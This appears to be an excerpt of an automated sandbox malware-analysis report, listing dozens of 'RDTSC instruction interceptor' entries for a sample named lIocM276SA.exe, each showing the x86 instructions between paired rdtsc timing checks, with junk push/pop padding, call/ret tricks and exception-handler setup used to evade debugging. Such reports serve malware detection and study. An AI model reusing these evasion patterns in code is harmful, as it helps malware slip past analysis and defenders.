Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4E832D second address: 4E8331 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4E8331 second address: 4E833E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4E9047 second address: 4E9052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F77A0BA2866h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4E8E1E second address: 4E8E24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4E98D4 second address: 4E98E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4E9ADE second address: 4E9AF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0B95E12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4E98E2 second address: 4E98ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F77A0BA2866h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4EA57D second address: 4EA583 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4EA583 second address: 4EA598 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jne 00007F77A0BA2866h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4EA598 second address: 4EA5E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jg 00007F77A0B95E06h 0x0000000c pop esi 0x0000000d popad 0x0000000e nop 0x0000000f jns 00007F77A0B95E06h 0x00000015 push 00000000h 0x00000017 sub si, EE37h 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push edi 0x00000021 call 00007F77A0B95E08h 0x00000026 pop edi 0x00000027 mov dword ptr [esp+04h], edi 0x0000002b add dword ptr [esp+04h], 0000001Ah 0x00000033 inc edi 0x00000034 push edi 0x00000035 ret 0x00000036 pop edi 0x00000037 ret 0x00000038 push eax 0x00000039 mov dword ptr [ebp+122D3331h], edx 0x0000003f pop edi 0x00000040 cmc 0x00000041 xchg eax, ebx 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4EA5E7 second address: 4EA5EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4EA5EB second address: 4EA5F4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4EA5F4 second address: 4EA60C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77A0BA286Ch 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4EC629 second address: 4EC62F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4ED691 second address: 4ED6F3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 jmp 00007F77A0BA2875h 0x0000000d nop 0x0000000e mov dword ptr [ebp+12476E61h], edx 0x00000014 mov ebx, dword ptr [ebp+1244B817h] 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push edi 0x0000001f call 00007F77A0BA2868h 0x00000024 pop edi 0x00000025 mov dword ptr [esp+04h], edi 0x00000029 add dword ptr [esp+04h], 00000014h 0x00000031 inc edi 0x00000032 push edi 0x00000033 ret 0x00000034 pop edi 0x00000035 ret 0x00000036 mov ebx, dword ptr [ebp+122D3C1Dh] 0x0000003c xor dword ptr [ebp+122D1F8Ah], esi 0x00000042 push 00000000h 0x00000044 mov dword ptr [ebp+122D2DCAh], edi 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4EC77A second address: 4EC77E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4ED6F3 second address: 4ED6FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4EC77E second address: 4EC788 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F77A0B95E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4EE5D0 second address: 4EE61C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d nop 0x0000000e xor di, 264Fh 0x00000013 push 00000000h 0x00000015 mov dword ptr [ebp+122D303Bh], ecx 0x0000001b push 00000000h 0x0000001d mov dword ptr [ebp+122D2FF2h], edx 0x00000023 xchg eax, esi 0x00000024 jnp 00007F77A0BA287Dh 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d jnp 00007F77A0BA2868h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4ED81F second address: 4ED850 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0B95E12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b je 00007F77A0B95E1Eh 0x00000011 pushad 0x00000012 jmp 00007F77A0B95E10h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4EE61C second address: 4EE622 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4EF7EB second address: 4EF7FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b js 00007F77A0B95E06h 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4EF919 second address: 4EF91E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4EF91E second address: 4EF936 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0B95E0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4EF936 second address: 4EF93D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4EF93D second address: 4EF943 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4EF943 second address: 4EF947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4F0A58 second address: 4F0A5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4F275C second address: 4F2766 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F77A0BA2866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4F1920 second address: 4F193B instructions: 0x00000000 rdtsc 0x00000002 js 00007F77A0B95E0Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F77A0B95E08h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4F3704 second address: 4F370E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F77A0BA2866h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4F370E second address: 4F3712 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4F2905 second address: 4F29A4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F77A0BA287Fh 0x00000008 jmp 00007F77A0BA2879h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 pushad 0x00000013 sub di, DA0Fh 0x00000018 mov edx, 5609CB81h 0x0000001d popad 0x0000001e push dword ptr fs:[00000000h] 0x00000025 mov ebx, eax 0x00000027 mov dword ptr fs:[00000000h], esp 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007F77A0BA2868h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 0000001Bh 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 mov dword ptr [ebp+122D2EF5h], edi 0x0000004e mov eax, dword ptr [ebp+122D0545h] 0x00000054 cmc 0x00000055 mov dword ptr [ebp+122D3187h], ebx 0x0000005b push FFFFFFFFh 0x0000005d mov dword ptr [ebp+122D383Ch], edx 0x00000063 mov ebx, 4B9C7934h 0x00000068 nop 0x00000069 js 00007F77A0BA286Eh 0x0000006f push edx 0x00000070 jne 00007F77A0BA2866h 0x00000076 pop edx 0x00000077 push eax 0x00000078 jnc 00007F77A0BA2870h 0x0000007e push eax 0x0000007f push edx 0x00000080 push ecx 0x00000081 pop ecx 0x00000082 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4F8FBA second address: 4F9032 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F77A0B95E0Ch 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F77A0B95E08h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 jmp 00007F77A0B95E0Ah 0x0000002d push 00000000h 0x0000002f call 00007F77A0B95E12h 0x00000034 mov edi, dword ptr [ebp+122D3AA9h] 0x0000003a pop edi 0x0000003b push 00000000h 0x0000003d ja 00007F77A0B95E0Ch 0x00000043 xchg eax, esi 0x00000044 push eax 0x00000045 push edx 0x00000046 ja 00007F77A0B95E08h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4F9032 second address: 4F905B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F77A0BA286Ah 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F77A0BA2874h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4FA036 second address: 4FA04C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 je 00007F77A0B95E12h 0x0000000e jbe 00007F77A0B95E0Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4F59E9 second address: 4F59EE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4F80C4 second address: 4F80C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4F80C9 second address: 4F80CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4FA222 second address: 4FA296 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F77A0B95E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F77A0B95E0Eh 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 mov bx, si 0x00000016 push dword ptr fs:[00000000h] 0x0000001d jmp 00007F77A0B95E13h 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 movzx edi, bx 0x0000002c jnp 00007F77A0B95E0Ch 0x00000032 mov eax, dword ptr [ebp+122D0BC1h] 0x00000038 mov dword ptr [ebp+1244B3F9h], esi 0x0000003e mov ebx, dword ptr [ebp+122D39B5h] 0x00000044 push FFFFFFFFh 0x00000046 mov dword ptr [ebp+1244B71Bh], esi 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f je 00007F77A0B95E0Ch 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4FA296 second address: 4FA29A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4FB0FE second address: 4FB112 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0B95E0Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4FB112 second address: 4FB116 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4FF094 second address: 4FF098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4FF098 second address: 4FF09E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4FF09E second address: 4FF0A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4FF0A4 second address: 4FF0B1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 502C4B second address: 502C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F77A0B95E13h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 502C69 second address: 502C8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0BA286Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F77A0BA286Fh 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 505AFE second address: 505B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F77A0B95E0Bh 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 505B11 second address: 505B1B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F77A0BA2866h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 505B1B second address: 505B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 505B21 second address: 505B39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F77A0BA286Eh 0x00000009 jng 00007F77A0BA2866h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 505B39 second address: 505B49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F77A0B95E0Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 505CB2 second address: 505CB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 505CB6 second address: 505CBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 505E11 second address: 505E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 50C80B second address: 50C846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop ebx 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jbe 00007F77A0B95E12h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F77A0B95E19h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 50C846 second address: 50C84C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 50C9B2 second address: 50C9B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 50CA82 second address: 50CAB3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007F77A0BA286Ch 0x00000011 mov eax, dword ptr [eax] 0x00000013 jmp 00007F77A0BA286Eh 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push esi 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 50CAB3 second address: 50CAB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 510EBA second address: 510EC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 510FFA second address: 511004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F77A0B95E06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5119CA second address: 5119CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5119CE second address: 5119F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F77A0B95E06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F77A0B95E14h 0x00000015 push edx 0x00000016 pop edx 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5119F5 second address: 5119FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 516D79 second address: 516D7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 516D7F second address: 516D83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 516D83 second address: 516DBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0B95E15h 0x00000007 jmp 00007F77A0B95E0Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jno 00007F77A0B95E08h 0x00000014 pushad 0x00000015 js 00007F77A0B95E06h 0x0000001b push eax 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 51584D second address: 51585B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F77A0BA2866h 0x0000000a pop ecx 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 515C2C second address: 515C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 515C30 second address: 515C4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F77A0BA2866h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F77A0BA286Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 515F29 second address: 515F2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 516090 second address: 5160A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F77A0BA286Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5160A1 second address: 5160A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5160A5 second address: 5160F0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F77A0BA2866h 0x00000008 jmp 00007F77A0BA2870h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F77A0BA286Fh 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 jl 00007F77A0BA286Ah 0x0000001d push edi 0x0000001e pop edi 0x0000001f push esi 0x00000020 pop esi 0x00000021 pushad 0x00000022 jl 00007F77A0BA2866h 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b pushad 0x0000002c push ecx 0x0000002d pop ecx 0x0000002e pushad 0x0000002f popad 0x00000030 pushad 0x00000031 popad 0x00000032 popad 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 51666F second address: 516673 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 51C128 second address: 51C12C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 51C12C second address: 51C130 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 51C130 second address: 51C13B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
